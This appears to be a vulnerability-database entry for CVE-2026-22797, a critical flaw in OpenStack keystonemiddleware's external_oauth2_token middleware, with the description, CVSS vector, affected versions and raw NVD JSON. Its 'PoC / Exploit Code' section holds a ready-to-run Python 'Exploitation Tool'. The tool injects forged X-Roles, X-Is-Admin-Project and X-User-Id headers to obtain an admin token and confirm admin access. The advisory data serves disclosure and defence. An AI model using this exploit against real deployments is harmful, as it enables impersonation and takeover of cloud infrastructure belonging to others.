Security Vulnerability Report
中文
CVE-2026-22797 CVSS 9.9 CRITICAL

CVE-2026-22797

Published: 2026-01-19 18:16:05
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

OpenStack keystonemiddleware 10.5 - 10.7(< 10.7.2)
OpenStack keystonemiddleware 10.8(< 10.9.1)
OpenStack keystonemiddleware 10.10 - 10.12(< 10.12.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-22797 PoC - OpenStack keystonemiddleware Identity Forgery # Requires valid OAuth2 token and network access to target import requests import json TARGET_URL = "https://target-openstack.example.com:5000/v3/auth/tokens" OAUTH_TOKEN = "your_valid_oauth2_token_here" def exploit_privilege_escalation(): """ Exploit CVE-2026-22797 by injecting forged identity headers to escalate privileges or impersonate admin users """ headers = { "Authorization": f"Bearer {OAUTH_TOKEN}", "Content-Type": "application/json", # Forged identity headers - the vulnerability "X-Is-Admin-Project": "admin", "X-Roles": "admin", "X-User-Id": "0", "X-User-Name": "admin" } payload = { "auth": { "identity": { "methods": ["oauth2"], "oauth2": {"id_token": OAUTH_TOKEN} } } } try: response = requests.post(TARGET_URL, headers=headers, json=payload, verify=False, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response Headers: {dict(response.headers)}") if "X-Subject-Token" in response.headers: print("[+] SUCCESS: Forged admin token obtained!") print(f"Admin Token: {response.headers['X-Subject-Token']}") return response.headers.get("X-Subject-Token") else: print("[-] Failed to obtain forged token") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def verify_admin_access(admin_token): """Verify obtained token has admin privileges""" verify_url = "https://target-openstack.example.com:8774/v2.1/os-simple-tenant-usage" headers = {"X-Auth-Token": admin_token} response = requests.get(verify_url, headers=headers, verify=False) return response.status_code == 200 if __name__ == "__main__": print("=" * 60) print("CVE-2026-22797 Exploitation Tool") print("OpenStack keystonemiddleware Identity Header Injection") print("=" * 60) admin_token = exploit_privilege_escalation() if admin_token and verify_admin_access(admin_token): print("\n[!] Full admin access confirmed!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22797", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:04.950", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in OpenStack keystonemiddleware 10.5 through 10.7 before 10.7.2, 10.8 and 10.9 before 10.9.1, and 10.10 through 10.12 before 10.12.1. The external_oauth2_token middleware fails to sanitize incoming authentication headers before processing OAuth 2.0 tokens. By sending forged identity headers such as X-Is-Admin-Project, X-Roles, or X-User-Id, an authenticated attacker may escalate privileges or impersonate other users. All deployments using the external_oauth2_token middleware are affected."}, {"lang": "es", "value": "Se descubrió un problema en OpenStack keystonemiddleware 10.5 hasta 10.7 antes de 10.7.2, 10.8 y 10.9 antes de 10.9.1, y 10.10 hasta 10.12 antes de 10.12.1. El middleware external_oauth2_token no sanea los encabezados de autenticación entrantes antes de procesar los tokens de OAuth 2.0. Al enviar encabezados de identidad falsificados como X-Is-Admin-Project, X-Roles, o X-User-Id, un atacante autenticado puede escalar privilegios o suplantar a otros usuarios. Todas las implementaciones que utilizan el middleware external_oauth2_token se ven afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://launchpad.net/bugs/2129018", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/01/16/9", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/15/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.